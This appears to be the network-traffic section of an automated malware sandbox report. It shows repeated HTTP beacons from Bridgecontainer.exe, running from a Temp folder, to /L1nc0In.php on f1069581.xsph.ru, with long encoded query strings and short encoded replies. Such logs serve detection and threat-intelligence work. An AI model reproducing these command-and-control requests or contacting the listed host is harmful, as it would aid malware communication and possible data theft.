                25192.168.2.550001141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:11.782843113 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:12.467449903 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:12 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                26192.168.2.550002141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:17.482655048 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:18.167092085 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:18 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                27192.168.2.550003141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:23.188725948 CET2230OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:23.864540100 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:23 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                28192.168.2.550004141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:28.876593113 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:19:29.556889057 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:29 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                29192.168.2.550005141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:34.575462103 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:35.258728027 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:35 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.550006141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:40.278254986 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:40.994932890 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:40 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                31192.168.2.550007141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:46.020806074 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:46.698717117 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:46 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                32192.168.2.550008141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:51.728722095 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:19:52.417803049 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:19:52 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                33192.168.2.550009141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:19:57.436964989 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
